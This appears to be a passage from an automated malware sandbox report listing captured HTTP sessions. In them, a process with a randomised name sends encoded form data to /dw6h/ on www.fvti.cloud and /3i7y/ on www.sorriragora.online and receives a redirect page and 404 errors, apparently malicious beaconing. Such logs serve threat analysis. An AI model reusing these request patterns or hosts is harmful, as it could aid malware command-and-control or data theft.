                        Data Raw: 31 61 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5d 92 b1 4e c3 30 14 45 f7 7e 85 c9 42 2a 41 9c 02 a5 0d 0d 45 42 62 65 62 43 08 b9 f1 4b 1d 14 c7 95 fd 02 aa a0 23 3f c0 0a 12 03 42 30 c0 84 04 03 42 7c 4d a1 9f 81 dd b4 50 f1 86 38 b6 af ef 7d 3e 72 bc c4 55 82 c3 01 10 81 32 ef d6 e2 f9 00 8c 77 6b c4 56 8c 19 e6 d0 fd 7a be 1b df 3c 4e 3e af c7 97 f7 c1 b4 62 5a ed 54 2a 09 c8 48 22 98 36 80 db 5e 89 e9 6a db b3 76 26 d1 d9 00 bb b5 53 a6 c9 b1 90 48 b6 ab e1 e2 82 1c 1e 75 6a 7e 5a 16 09 66 aa f0 eb e4 dc 1a 39 99 90 56 64 bb 2a 25 14 18 24 1a 18 c2 5e 0e 6e e6 7b 95 9f 57 ef 58 b1 90 81 d1 89 15 7b 02 71 60 b6 28 b5 2b 3d 96 f1 32 48 94 74 93 13 b3 c3 c2 cd de 06 6f 6c 36 23 be ce 43 be 06 cd 76 a3 15 71 9e c2 46 ab cd d7 9a 9e 73 72 b1 66 31 b5 0f 38 8b 34 bb c3 03 d6 df 67 12 fe c2 0f c3 a3 0e b1 c7 4c 30 60 da b6 b5 af 38 04 59 61 40 e3 2e a4 4a 83 2f e4 0a 31 b6 c9 51 dd b7 df 98 ce 31 d8 5f 31 25 1b f7 14 1f 2e f0 71 a4 cf b2 82 ab b3 40 15 b9 62 dc 76 f3 8f 8d 93 d8 4c c0 83 4c 82 2a f1 3f [TRUNCATED]
                        Data Ascii: 1a2]N0E~B*AEBbebCK#?B0B|MP8}>rU2wkVz<N>bZT*H"6^jv&SHuj~Zf9Vd*%$^n{WX{q`(+=2Htol6#CvqFsrf184gL0`8Ya@.J/1Q1_1%.q@bvLL*?j(Wsl!~sL)C$(#XT5Z!0B)N>oWT5wJt~8ZY0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        34192.168.2.44977638.55.112.70802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:53:56.029195070 CEST776OUTPOST /dw6h/ HTTP/1.1
                        Host: www.fvti.cloud
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.fvti.cloud
                        Referer: http://www.fvti.cloud/dw6h/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 63 39 42 6b 2f 39 32 58 63 6d 32 4c 2b 55 72 45 6b 62 31 63 57 53 44 50 30 66 35 68 2b 51 2f 53 4f 56 2f 46 46 69 4b 64 52 4e 7a 69 43 2b 48 7a 45 6e 53 79 68 4c 61 4e 36 4d 38 58 65 47 56 34 76 66 79 79 4b 4e 53 74 58 75 52 6e 57 31 78 6e 76 46 38 78 2f 37 46 39 6a 63 57 61 4b 48 36 50 32 55 41 67 52 55 71 67 71 36 56 6f 79 44 56 65 2b 50 31 4c 39 74 30 37 75 78 59 44 30 71 35 72 6a 67 37 37 42 56 38 4f 33 67 42 6d 64 64 53 62 50 75 73 79 6d 39 41 58 2b 31 53 65 52 64 37 7a 6a 6a 62 6c 59 43 46 69 75 54 71 4f 46 72 37 44 4f 79 74 74 75 2f 72 51 70 4f 59 2f 71 63 74 4e 42 51 54 30 44 36 30 75 50 42 4f 62 44 58 77 56 47 46 2b 6b 4c 76 34 3d
                        Data Ascii: lt=c9Bk/92Xcm2L+UrEkb1cWSDP0f5h+Q/SOV/FFiKdRNziC+HzEnSyhLaN6M8XeGV4vfyyKNStXuRnW1xnvF8x/7F9jcWaKH6P2UAgRUqgq6VoyDVe+P1L9t07uxYD0q5rjg77BV8O3gBmddSbPusym9AX+1SeRd7zjjblYCFiuTqOFr7DOyttu/rQpOY/qctNBQT0D60uPBObDXwVGF+kLv4=
                        Sep 9, 2024 04:53:56.940342903 CEST635INHTTP/1.1 200 OK
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:53:56 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Content-Encoding: gzip
                        Data Raw: 31 61 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5d 92 b1 4e c3 30 14 45 f7 7e 85 c9 42 2a 41 9c 02 a5 0d 0d 45 42 62 65 62 43 08 b9 f1 4b 1d 14 c7 95 fd 02 aa a0 23 3f c0 0a 12 03 42 30 c0 84 04 03 42 7c 4d a1 9f 81 dd b4 50 f1 86 38 b6 af ef 7d 3e 72 bc c4 55 82 c3 01 10 81 32 ef d6 e2 f9 00 8c 77 6b c4 56 8c 19 e6 d0 fd 7a be 1b df 3c 4e 3e af c7 97 f7 c1 b4 62 5a ed 54 2a 09 c8 48 22 98 36 80 db 5e 89 e9 6a db b3 76 26 d1 d9 00 bb b5 53 a6 c9 b1 90 48 b6 ab e1 e2 82 1c 1e 75 6a 7e 5a 16 09 66 aa f0 eb e4 dc 1a 39 99 90 56 64 bb 2a 25 14 18 24 1a 18 c2 5e 0e 6e e6 7b 95 9f 57 ef 58 b1 90 81 d1 89 15 7b 02 71 60 b6 28 b5 2b 3d 96 f1 32 48 94 74 93 13 b3 c3 c2 cd de 06 6f 6c 36 23 be ce 43 be 06 cd 76 a3 15 71 9e c2 46 ab cd d7 9a 9e 73 72 b1 66 31 b5 0f 38 8b 34 bb c3 03 d6 df 67 12 fe c2 0f c3 a3 0e b1 c7 4c 30 60 da b6 b5 af 38 04 59 61 40 e3 2e a4 4a 83 2f e4 0a 31 b6 c9 51 dd b7 df 98 ce 31 d8 5f 31 25 1b f7 14 1f 2e f0 71 a4 cf b2 82 ab b3 40 15 b9 62 dc 76 f3 8f 8d 93 d8 4c c0 83 4c 82 2a f1 3f [TRUNCATED]
                        Data Ascii: 1a2]N0E~B*AEBbebCK#?B0B|MP8}>rU2wkVz<N>bZT*H"6^jv&SHuj~Zf9Vd*%$^n{WX{q`(+=2Htol6#CvqFsrf184gL0`8Ya@.J/1Q1_1%.q@bvLL*?j(Wsl!~sL)C$(#XT5Z!0B)N>oWT5wJt~8ZY0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        35192.168.2.44977738.55.112.70802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:53:58.580576897 CEST10858OUTPOST /dw6h/ HTTP/1.1
                        Host: www.fvti.cloud
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.fvti.cloud
                        Referer: http://www.fvti.cloud/dw6h/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 63 39 42 6b 2f 39 32 58 63 6d 32 4c 2b 55 72 45 6b 62 31 63 57 53 44 50 30 66 35 68 2b 51 2f 53 4f 56 2f 46 46 69 4b 64 52 4d 4c 69 42 4d 50 7a 46 45 36 79 67 4c 61 4e 77 73 38 73 65 47 55 6b 76 66 71 32 4b 4e 75 58 58 73 70 6e 5a 33 70 6e 2f 68 6f 78 6b 72 46 39 2b 4d 57 62 55 33 37 56 32 55 51 38 52 55 61 67 71 36 56 6f 79 41 64 65 39 65 31 4c 2f 74 30 38 6d 52 59 66 77 71 35 54 6a 67 7a 46 42 56 6f 77 33 55 31 6d 64 39 43 62 4a 64 45 79 74 39 41 52 39 31 54 44 52 64 33 57 6a 67 2f 70 59 47 45 4a 75 55 61 4f 47 61 2b 45 4b 54 56 71 38 63 6a 4d 38 65 49 62 70 2b 46 62 48 54 48 31 4e 71 6f 79 51 79 2b 32 59 47 74 2b 57 55 65 56 51 49 4f 65 54 76 6a 41 35 6e 63 61 43 55 33 79 64 62 68 55 73 70 65 4c 30 59 64 44 77 41 66 67 43 66 73 4b 4a 73 6e 51 63 57 4e 64 34 35 4d 44 5a 70 4f 6d 2b 58 54 6c 4f 50 4d 55 2b 5a 2b 34 6b 45 58 62 43 39 35 54 32 79 79 39 62 67 7a 39 67 70 43 75 77 78 32 6d 6a 58 6d 4a 73 76 42 70 68 59 43 6b 2f 35 4f 4c 45 30 7a 38 4b 77 47 4b 4e 43 2b 4e 41 34 6c 44 78 6c 46 [TRUNCATED]
                        Data Ascii: lt=c9Bk/92Xcm2L+UrEkb1cWSDP0f5h+Q/SOV/FFiKdRMLiBMPzFE6ygLaNws8seGUkvfq2KNuXXspnZ3pn/hoxkrF9+MWbU37V2UQ8RUagq6VoyAde9e1L/t08mRYfwq5TjgzFBVow3U1md9CbJdEyt9AR91TDRd3Wjg/pYGEJuUaOGa+EKTVq8cjM8eIbp+FbHTH1NqoyQy+2YGt+WUeVQIOeTvjA5ncaCU3ydbhUspeL0YdDwAfgCfsKJsnQcWNd45MDZpOm+XTlOPMU+Z+4kEXbC95T2yy9bgz9gpCuwx2mjXmJsvBphYCk/5OLE0z8KwGKNC+NA4lDxlFGPRYwPapxixHM5obu8vfz3Wmm2vZbPjfZdbBE0+YuR6PqmkIPdiYo6ToOeVtIVfbpqEhys5Ol7vQl/gU3zOFg9sY7YSqlR23cGicG+h+l76tO6jMYysO/vyZf342YOByvw8gEHRoGc/nJPgAhuudrm+Kupm4QCr55mxlh+WwXHMc+qXte+oOJcFhOHnfFyP8DgnELBhFmxFAa6Lpoq7QFS/RpNDNdvXZplHwzoniUHbVwMamAABHOnCQxPMDCP40ONjEMFlNknJUWDOzLT4R9cLdhnPtIOiX+UhFlimvt83K5l8+ELNlULI6+64AVKpO6FCH5h2d9TCWWYFNyuAz19R5wOF2EmiDgFlJ/GYfRttdo+gMPKDgEjNFhLqgz2kkB8d6Ec1iu/K52UxQSbWtPU7vqeapHOjztGShYKJiCYLbO0knyGcXziiU7cZiL1iXFdERhgTCIPT8nQnEbqYQvwES9rhMruNNIdfXg6jjGibMPEpMzW7Khv6PObHZ/Iccu4iQpP3YRTiWuqKvU6lUMts+qZ6gghwWKD0QqwVRZNQHDGu7JIfyK6e5i4388WKWajUnONKaDgV+7NwdjNfhX8cFvy+IRvJ2kF7ni4tnjrCnt9OcAxfO4gzDRHYlVvOcsuG962mfkCV/8ScJamJFCD1ug21Ce8iO5k [TRUNCATED]
                        Sep 9, 2024 04:53:59.485311031 CEST635INHTTP/1.1 200 OK
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:53:59 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Content-Encoding: gzip
                        Data Raw: 31 61 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5d 92 b1 4e c3 30 14 45 f7 7e 85 c9 42 2a 41 9c 02 a5 0d 0d 45 42 62 65 62 43 08 b9 f1 4b 1d 14 c7 95 fd 02 aa a0 23 3f c0 0a 12 03 42 30 c0 84 04 03 42 7c 4d a1 9f 81 dd b4 50 f1 86 38 b6 af ef 7d 3e 72 bc c4 55 82 c3 01 10 81 32 ef d6 e2 f9 00 8c 77 6b c4 56 8c 19 e6 d0 fd 7a be 1b df 3c 4e 3e af c7 97 f7 c1 b4 62 5a ed 54 2a 09 c8 48 22 98 36 80 db 5e 89 e9 6a db b3 76 26 d1 d9 00 bb b5 53 a6 c9 b1 90 48 b6 ab e1 e2 82 1c 1e 75 6a 7e 5a 16 09 66 aa f0 eb e4 dc 1a 39 99 90 56 64 bb 2a 25 14 18 24 1a 18 c2 5e 0e 6e e6 7b 95 9f 57 ef 58 b1 90 81 d1 89 15 7b 02 71 60 b6 28 b5 2b 3d 96 f1 32 48 94 74 93 13 b3 c3 c2 cd de 06 6f 6c 36 23 be ce 43 be 06 cd 76 a3 15 71 9e c2 46 ab cd d7 9a 9e 73 72 b1 66 31 b5 0f 38 8b 34 bb c3 03 d6 df 67 12 fe c2 0f c3 a3 0e b1 c7 4c 30 60 da b6 b5 af 38 04 59 61 40 e3 2e a4 4a 83 2f e4 0a 31 b6 c9 51 dd b7 df 98 ce 31 d8 5f 31 25 1b f7 14 1f 2e f0 71 a4 cf b2 82 ab b3 40 15 b9 62 dc 76 f3 8f 8d 93 d8 4c c0 83 4c 82 2a f1 3f [TRUNCATED]
                        Data Ascii: 1a2]N0E~B*AEBbebCK#?B0B|MP8}>rU2wkVz<N>bZT*H"6^jv&SHuj~Zf9Vd*%$^n{WX{q`(+=2Htol6#CvqFsrf184gL0`8Ya@.J/1Q1_1%.q@bvLL*?j(Wsl!~sL)C$(#XT5Z!0B)N>oWT5wJt~8ZY0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        36192.168.2.44977838.55.112.70802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:54:01.124044895 CEST491OUTGET /dw6h/?lt=R/pE8KC/c36ywADQh5FkOiDH8KVbuy/iFFPQAWrjddfpU+7mPUq4raSb1MURPFl7uYa4SfXFDOIuFXNkiFpjga1JutrdCl+XzV0YaijSh6Fqy01qwtES1vY=&3ry=nj20Xr HTTP/1.1
                        Host: www.fvti.cloud
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:54:02.019310951 CEST794INHTTP/1.1 200 OK
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:54:01 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Data Raw: 32 35 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e8 bf 9b e5 85 a5 2e 2e 2e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 61 30 36 62 34 64 31 36 35 39 64 33 64 30 64 32 65 35 38 31 37 39 64 64 66 65 34 37 38 64 32 35 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 [TRUNCATED]
                        Data Ascii: 259<!doctype html><html><head> <title>......</title> <meta charset="utf-8"><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?a06b4d1659d3d0d2e58179ddfe478d25"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script></head><body><script> window.onload = function() { setTimeout(function() { window.location.href = 'https://fe3e9h.com:9009/register'; }, 1000); // 1 }; </script></body></html>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        37192.168.2.449779162.240.81.18802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:54:15.609855890 CEST780OUTPOST /3i7y/ HTTP/1.1
                        Host: www.sorriragora.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.sorriragora.online
                        Referer: http://www.sorriragora.online/3i7y/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 32 38 65 4f 6b 71 71 71 72 52 58 2f 35 46 6a 66 52 79 35 79 30 4b 42 74 6e 4a 30 43 69 51 58 6b 73 67 6e 4b 66 49 54 63 4c 6a 43 46 72 62 74 65 74 4f 77 5a 37 6b 6d 76 61 67 68 4e 47 55 44 47 36 65 34 4c 31 39 5a 73 31 67 44 66 32 53 4f 74 36 36 44 36 2f 6f 54 38 6d 53 59 54 49 54 43 2b 6e 6c 76 71 51 33 46 54 4a 36 39 56 45 49 71 64 35 57 4b 67 6f 49 37 52 52 34 47 6f 75 38 70 6d 48 4a 30 34 75 6f 61 4d 2b 30 56 78 62 58 31 4a 67 71 6f 41 32 31 74 68 6d 50 75 64 62 4a 36 44 58 72 50 58 49 7a 49 70 52 61 74 73 71 52 54 57 6b 38 53 46 6f 43 63 6d 47 45 71 36 63 6e 70 76 4d 41 3d 3d
                        Data Ascii: lt=28eOkqqqrRX/5FjfRy5y0KBtnJ0CiQXksgnKfITcLjCFrbtetOwZ7kmvaghNGUDG6e4L19Zs1gDf2SOt66D6/oT8mSYTITC+nlvqQ3FTJ69VEIqd5WKgoI7RR4Gou8pmHJ04uoaM+0VxbX1JgqoA21thmPudbJ6DXrPXIzIpRatsqRTWk8SFoCcmGEq6cnpvMA==
                        Sep 9, 2024 04:54:16.181195021 CEST1236INHTTP/1.1 404 Not Found
                        Server: nginx/1.20.1
                        Date: Mon, 09 Sep 2024 02:54:16 GMT
                        Content-Type: text/html
                        Content-Length: 3650
                        Connection: close
                        ETag: "663a05b6-e42"
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                        Sep 9, 2024 04:54:16.181211948 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                        Sep 9, 2024 04:54:16.181226969 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                        Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                        Sep 9, 2024 04:54:16.181236982 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                        Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        38192.168.2.449780162.240.81.18802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:54:18.152858973 CEST800OUTPOST /3i7y/ HTTP/1.1
                        Host: www.sorriragora.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.sorriragora.online
                        Referer: http://www.sorriragora.online/3i7y/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 32 38 65 4f 6b 71 71 71 72 52 58 2f 6a 6b 54 66 58 56 74 79 34 36 42 75 6f 70 30 43 6f 77 58 6f 73 6e 76 4b 66 4d 4b 62 4c 56 53 46 72 36 78 65 73 50 77 5a 6f 55 6d 76 56 41 68 49 4c 30 44 33 36 65 30 44 31 39 6c 73 31 67 6e 66 32 51 47 74 36 4a 62 31 2f 34 54 36 71 79 59 4e 43 7a 43 2b 6e 6c 76 71 51 33 68 39 4a 36 56 56 45 34 36 64 6f 43 6d 68 68 6f 37 51 59 59 47 6f 71 38 70 69 48 4a 30 65 75 70 47 6d 2b 79 4a 78 62 57 46 4a 67 34 41 48 34 31 74 6a 70 76 76 46 4b 49 4b 49 50 4a 4b 49 41 53 4d 62 5a 70 4d 4e 6d 33 43 4d 31 4e 7a 53 36 43 34 56 62 44 6a 4f 52 6b 55 6d 58 48 31 77 68 4e 35 69 63 31 59 41 47 6c 4d 37 44 74 46 68 63 70 30 3d
                        Data Ascii: lt=28eOkqqqrRX/jkTfXVty46Buop0CowXosnvKfMKbLVSFr6xesPwZoUmvVAhIL0D36e0D19ls1gnf2QGt6Jb1/4T6qyYNCzC+nlvqQ3h9J6VVE46doCmhho7QYYGoq8piHJ0eupGm+yJxbWFJg4AH41tjpvvFKIKIPJKIASMbZpMNm3CM1NzS6C4VbDjORkUmXH1whN5ic1YAGlM7DtFhcp0=
                        Sep 9, 2024 04:54:18.700571060 CEST1236INHTTP/1.1 404 Not Found
                        Server: nginx/1.20.1
                        Date: Mon, 09 Sep 2024 02:54:18 GMT
                        Content-Type: text/html
                        Content-Length: 3650
                        Connection: close
                        ETag: "663a05b6-e42"
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                        Sep 9, 2024 04:54:18.700594902 CEST224INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
                        Sep 9, 2024 04:54:18.700606108 CEST1236INData Raw: 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 43 36 45 42 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                        Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
